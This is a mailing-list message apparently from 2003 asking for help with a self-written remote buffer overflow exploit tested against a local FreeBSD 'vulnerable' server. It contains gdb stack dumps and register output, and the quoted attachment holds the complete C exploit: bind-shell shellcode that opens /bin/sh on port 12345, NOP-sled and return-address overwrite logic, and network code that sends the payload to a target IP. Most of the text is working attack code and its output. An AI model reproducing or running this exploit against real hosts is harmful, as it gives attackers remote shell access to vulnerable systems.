[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: sample buffer overflow exploit problem



Hi Orlando,

I tested your modified exploit.
When I run exploit with offset 320:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 320
scsize: 131
ret: 0xbfbffa40
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
-----------------------------------------------------------------------------------------------------------------------------
It binds shell to port 12345. When I make connection to it in gdb I see following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9d0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9d8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9e0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9e8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9f0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbff9f8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa00:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa08:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa10:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa18:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa20:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa28:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa30:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa38:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa40:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffa48:     0x90    0x90    0x90    0x6a    0x10    0x89    0xe1    0x83
                                                     ^^^^^^ shellcode begins
0xbfbffa50:     0xec    0x10    0x89    0xe3    0x31    0xc0    0x50    0x50
0xbfbffa58:     0x50    0x66    0x68    0x30    0x39    0xb4    0x20    0x66
0xbfbffa60:     0x50    0x89    0xe2    0x6a    0x06    0x6a    0x01    0x6a
0xbfbffa68:     0x02    0x50    0x30    0xe4    0xb0    0x61    0xcd    0x80
0xbfbffa70:     0x89    0xc7    0x6a    0x10    0x52    0x50    0x50    0xb0
0xbfbffa78:     0x68    0xcd    0x80    0x31    0xc0    0x50    0x57    0x50
0xbfbffa80:     0x83    0xc0    0x6a    0xcd    0x80    0x51    0x53    0x57
0xbfbffa88:     0x50    0xb0    0x1e    0xcd    0x80    0x89    0xc3    0x31
-----------------------------------------------------------------------------------------------------------------------------
As you see shellcode is not full, I see only half of my shellcode.
So when exploit run server doesn't crash and binds shell port. But when I make connection to 12345 port, server crashes and x/200bx $esp-200 command shows above half of my shellcode.

Following is register information after crash:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax            0x9      9
ecx            0xbfbffaec       -1077937428
edx            0xbfbffacc       -1077937460
ebx            0x9      9
esp            0xbfbffa90       0xbfbffa90
ebp            0xbfbffa40       0xbfbffa40
esi            0xbfbffb80       -1077937280
edi            0x8      8
eip            0xbfbffa8f       0xbfbffa8f
eflags         0x10206  66054
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
st0            -nan(0x0000ca000)        (raw 0xffff00000000000ca000)
st1            -nan(0x000002000)        (raw 0xffff0000000000002000)
st2            0        (raw 0x00000000000000000000)
st3            0        (raw 0x00000000000000000000)
st4            0        (raw 0x00000000000000000000)
st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6            24       (raw 0x4003c000000000000000)
st7            60       (raw 0x4004f000000000000000)
fctrl          0x127f   4735
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
-----------------------------------------------------------------------------------------------------------------------------
But when I run exploit with 0 offset I see different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ?? ()
(gdb) x/300bx $esp-300
0xbfbffa48:     0x90    0x90    0x90    0x6a    0x10    0x89    0xe1    0x83
                                                     ^^^^^^ shellcode begins
0xbfbffa50:     0xec    0x10    0x89    0xe3    0x31    0xc0    0x50    0x50
0xbfbffa58:     0x50    0x66    0x68    0x30    0x39    0xb4    0x20    0x66
0xbfbffa60:     0x50    0x89    0xe2    0x6a    0x06    0x6a    0x01    0x6a
0xbfbffa68:     0x02    0x50    0x30    0xe4    0xb0    0x61    0xcd    0x80
0xbfbffa70:     0x89    0xc7    0x6a    0x10    0x52    0x50    0x50    0xb0
0xbfbffa78:     0x68    0xcd    0x80    0x31    0xc0    0x50    0x57    0x50
0xbfbffa80:     0x83    0xc0    0x6a    0xcd    0x80    0x51    0x53    0x57
0xbfbffa88:     0x50    0xb0    0x1e    0xcd    0x80    0x89    0xc3    0x31
0xbfbffa90:     0xc0    0x50    0x53    0x50    0xb0    0x5a    0xcd    0x80
0xbfbffa98:     0xb0    0x01    0x50    0x53    0x50    0x83    0xc0    0x59
0xbfbffaa0:     0xcd    0x80    0xb0    0x02    0x50    0x53    0x50    0x83
0xbfbffaa8:     0xc0    0x58    0xcd    0x80    0x31    0xc0    0x50    0x68
0xbfbffab0:     0x2f    0x2f    0x73    0x68    0x68    0x2f    0x62    0x69
0xbfbffab8:     0x6e    0x89    0xe3    0x50    0x53    0x89    0xe2    0x50
0xbfbffac0:     0x52    0x53    0x50    0xb0    0x3b    0xcd    0x80    0x31
0xbfbffac8:     0xc0    0x40    0x50    0x50    0xcd    0x80    0x90    0x90
^^^^^^ shellcode ends
0xbfbffad0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffad8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbffae0:     0x90    0x90    0x90    0x90    0x80    0xfb    0xbf    0xbf
^^^^^^ return address
0xbfbffae8:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffaf0:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffaf8:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb00:     0x80    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb08:     0x80    0xfb    0xbf    0x2c    0x20    0x6e    0x69    0x63
                                         ^^^^^^ ends here
0xbfbffb10:     0x65    0x20    0x74    0x6f    0x20    0x6d    0x65    0x65
0xbfbffb18:     0x74    0x20    0x79    0x6f    0x75    0x21    0x0d    0x0a
0xbfbffb20:     0x00    0x00    0x00    0x00    0x74    0x02    0x76    0xfc
0xbfbffb28:     0x00    0x00    0x00    0x00    0x41    0xc6    0x04    0x28
0xbfbffb30:     0x7e    0xf7    0x0f    0x28    0x60    0x00    0x00    0x00
0xbfbffb38:     0x10    0x00    0x00    0x00    0x07    0x00    0x00    0x00
0xbfbffb40:     0x06    0x00    0x00    0x00    0x02    0x00    0x00    0x00
0xbfbffb48:     0x6c    0xfb    0xbf    0xbf    0x6c    0xfb    0xbf    0xbf
0xbfbffb50:     0x15    0x87    0x04    0x08    0x02    0x00    0x00    0x00
0xbfbffb58:     0x74    0xfb    0xbf    0xbf    0x80    0xfb    0xbf    0xbf
0xbfbffb60:     0x68    0xfb    0xbf    0xbf    0x00    0x00    0x00    0x00
0xbfbffb68:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffb70:     0x02    0x00    0x00    0x00
-----------------------------------------------------------------------------------------------------------------------------
As you see I see all my shellcode and return address fully.
Following is the register infos:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax            0xffffffff       -1
ecx            0x9      9
edx            0xffffffff       -1
ebx            0x2      2
esp            0xbfbffb74       0xbfbffb74
ebp            0xbfbffb80       0xbfbffb80
esi            0xbfbffb80       -1077937280
edi            0xbfbffcb2       -1077936974
eip            0xbfbffb8c       0xbfbffb8c
eflags         0x10246  66118
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
st0            -nan(0x0000ca000)        (raw 0xffff00000000000ca000)
st1            -nan(0x000002000)        (raw 0xffff0000000000002000)
st2            0        (raw 0x00000000000000000000)
st3            0        (raw 0x00000000000000000000)
st4            0        (raw 0x00000000000000000000)
st5            0        (raw 0x00000000000000000000)
st6            0        (raw 0x00000000000000000000)
st7            10       (raw 0x4002a000000000000000)
fctrl          0x127f   4735
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
-----------------------------------------------------------------------------------------------------------------------------
I'm very confused and I don't know yet what to do.
Please give me some advice.

thanks in advance,

Ganbold



At 01:45 PM 9/30/2003 -0500, you wrote:
attachment

#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
  * FreeBSD shellcode - binds /bin/sh to a port 12345
  *
  * Claes M. Nyberg 20020619
  *
  * <cmn@xxxxxxxxxxx>, <md0claes@xxxxxxxxxxxxxxxxxx>
  */
char shellcode[]
=
/* port _______*/

"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"

"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"

"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"

"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"

"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"

"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"

"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
        "\x40\x50\x50\xcd\x80";
#define RET 0xbfbffb80 //0xbfbffa48

int exec_sh(int sockfd)
{
         char snd[4096],rcv[4096];
         fd_set rset;
         while(1)
         {
                 FD_ZERO(&rset);
                 FD_SET(fileno(stdin),&rset);
                 FD_SET(sockfd,&rset);
                 select(255,&rset,NULL,NULL,NULL);
                 if(FD_ISSET(fileno(stdin),&rset))
                 {
                         memset(snd,0,sizeof(snd));
                         fgets(snd,sizeof(snd),stdin);
                         write(sockfd,snd,strlen(snd));
                 }
                 if(FD_ISSET(sockfd,&rset))
                 {
                         memset(rcv,0,sizeof(rcv));
                         if(read(sockfd,rcv,sizeof(rcv))<=0)
                                 exit(0);
                         fputs(rcv,stdout);
                 }
         }
}

int main(int argc, char *argv[]) {

        char buffer[1064];
        int s,t, i, size,offset;
        struct sockaddr_in remote;
        struct hostent *host;

        if(argc != 4) {
                printf("Usage: %s target-ip port offset\n", argv[0]);
                return -1;
        }
        offset = RET - atoi(argv[3]);
        // filling buffer with NOPs
        memset(buffer, 0x90, 1064);

        printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
        //copying shellcode into buffer
        memcpy(buffer+1001-sizeof(shellcode) , shellcode,
sizeof(shellcode)-1);

        // Copying the return address multiple times at the end of the
buffer...
        for(i=1022; i < 1060; i+=4) {
                * ((int *) &buffer[i]) = offset;
        }

        buffer[1061] = 0x0;

        //getting hostname

        host=gethostbyname(argv[1]);
        if (host==NULL)
        {
                fprintf(stderr, "Unknown Host %s\n",argv[1]);
                return -1;
        }

        // creating socket...
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
        {
                fprintf(stderr, "Error: Socket\n");
                return -1;
        }
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(atoi(argv[2]));
        // connecting with destination host
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
        {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }
        //sending exploit string
        size = send(s, buffer, sizeof(buffer), 0);
        if (size==-1)
        {
                close(s);
                fprintf(stderr, "sending data failed\n");
                return -1;
        }
/*
        printf("[-] Connecting to bindshell...\n");
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(12345);
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
        {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }
        exec_sh(s);
*/
        // closing socket
        close(s);
}